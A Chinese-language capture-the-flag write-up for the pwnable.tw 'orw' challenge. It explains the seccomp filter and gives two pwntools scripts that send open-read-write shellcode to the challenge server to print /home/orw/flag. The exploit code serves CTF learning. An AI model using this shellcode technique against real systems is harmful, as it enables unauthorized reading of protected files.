题源
题解
保护
只开启了栈保护
分析
进入ida分析 main函数如下
seccomp (Secure Computing Mode)是一种 Linux 内核安全机制,它可以 限制进程可执行的系统调用(syscall),用于减少攻击面,提高程序安全性。
使用seccomp-tools查看允许调用的函数,即orw(open,read,write)
seccomp安装方法
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
使用方法
seccomp-tools dump ./orw
该题只允许调用open,read,write.再联系题目上的信息,flag在/home/orw/flag下,即调用open打开文件,read读取文件,write输出文件内容,接下来就是编写shellcode,使用Pwntools下的shellcraft帮助编写
exp
open(path,flag,mode) flag:只读 只写 读写 mode:新建文件的权限
read(fd,buf,count) fd:文件描述符 buf:内存缓冲区 count:读取字符数
write(fd,buf,count) 和read相同
第一种
点我一下QaQ
from pwn import *
context(os='linux', arch='i386', log_level='debug')
content = 0
if content == 1:
io = process("./orw")
else:
io = remote("chall.pwnable.tw",10001)
def main():
io.recvuntil("shellcode:")
payload = shellcraft.open('/home/orw/flag',0,0)
payload += shellcraft.read(3,'/home/orw/flag', 100)
#当一个文件被打开时,会占用0,1,2三个文件描述符,而Linux中文件描述符是增加的,所以会返回3
payload += shellcraft.write(1, '/home/orw/flag', 100)
#这里的fd = 1指标准输出到终端
io.sendline(asm(payload))
io.interactive()
if __name__ == '__main__':
main()
第二种
再点我一下 0.0
from pwn import *
context(os='linux', arch='i386', log_level='debug')
content = 0
if content == 1:
io = process("./orw")
else:
io = remote("chall.pwnable.tw",10001)
def main():
io.recvuntil("shellcode:")
payload = shellcraft.open('/home/orw/flag')
payload += shellcraft.read('eax','ebp', 100)
#open返回的文件描述符会存入eax,ebp作为缓冲区地址,存放读取的内容,即'/home/orw/flag'
payload += shellcraft.write(1, 'ebp', 100)
io.sendline(asm(payload))
io.interactive()
if __name__ == '__main__':
main()
推荐第二种,因为在不同的系统调用中,返回的文件描述符不一定相同,但是一定都存放在eax中.
在第一种中的payload += shellcraft.read(3,'/home/orw/flag', 100)和write调用中,
'/home/orw/flag'会shellcraft作为缓冲区地址,但是Pwntools会自动处理.因此第二种更有普适性
得到flag